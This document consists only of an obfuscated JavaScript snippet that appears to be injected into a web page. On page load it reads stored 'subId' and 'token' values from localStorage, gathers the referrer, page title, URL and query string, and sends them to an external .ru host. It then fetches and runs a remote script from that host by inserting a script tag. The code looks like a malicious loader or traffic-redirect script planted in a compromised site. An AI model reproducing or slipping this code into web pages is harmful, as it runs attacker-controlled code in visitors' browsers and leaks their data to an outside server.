<script>
    (function() {
    var name = '_Nwpjv6nnsXL5W9dc';
    if (!window._Nwpjv6nnsXL5W9dc) {
        window._Nwpjv6nnsXL5W9dc = {
            unique: true,
            ttl: 86400,
            R_PATH: 'https://yellowsrfh.ru/bVtFTn',
        };
    }
    const _fdTTWYhmzDfZ6tDs = localStorage.getItem('config');
    if (typeof _fdTTWYhmzDfZ6tDs !== 'undefined' && _fdTTWYhmzDfZ6tDs !== null) {
        var _Qzt5chZSPGbZ3ZQX = JSON.parse(_fdTTWYhmzDfZ6tDs);
        var _WMfLSvsgPYsDKVKH = Math.round(+new Date()/1000);
        if (_Qzt5chZSPGbZ3ZQX.created_at + window._Nwpjv6nnsXL5W9dc.ttl < _WMfLSvsgPYsDKVKH) {
            localStorage.removeItem('subId');
            localStorage.removeItem('token');
            localStorage.removeItem('config');
        }
    }
    var _gQJ34pn3kKWXpNWR = localStorage.getItem('subId');
    var _mJNKKghYnfDks5FL = localStorage.getItem('token');
    var _2s6vbgP182Dhj3HS = '?return=js.client';
        _2s6vbgP182Dhj3HS += '&' + decodeURIComponent(window.location.search.replace('?', ''));
        _2s6vbgP182Dhj3HS += '&se_referrer=' + encodeURIComponent(document.referrer);
        _2s6vbgP182Dhj3HS += '&default_keyword=' + encodeURIComponent(document.title);
        _2s6vbgP182Dhj3HS += '&landing_url=' + encodeURIComponent(document.location.hostname + document.location.pathname);
        _2s6vbgP182Dhj3HS += '&name=' + encodeURIComponent(name);
        _2s6vbgP182Dhj3HS += '&host=' + encodeURIComponent(window._Nwpjv6nnsXL5W9dc.R_PATH);
    if (typeof _gQJ34pn3kKWXpNWR !== 'undefined' && _gQJ34pn3kKWXpNWR && window._Nwpjv6nnsXL5W9dc.unique) {
        _2s6vbgP182Dhj3HS += '&sub_id=' + encodeURIComponent(_gQJ34pn3kKWXpNWR);
    }
    if (typeof _mJNKKghYnfDks5FL !== 'undefined' && _mJNKKghYnfDks5FL && window._Nwpjv6nnsXL5W9dc.unique) {
        _2s6vbgP182Dhj3HS += '&token=' + encodeURIComponent(_mJNKKghYnfDks5FL);
    }
    var a = document.createElement('script');
        a.type = 'application/javascript';
        a.src = window._Nwpjv6nnsXL5W9dc.R_PATH + _2s6vbgP182Dhj3HS;
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(a, s)
    })();
    </script>
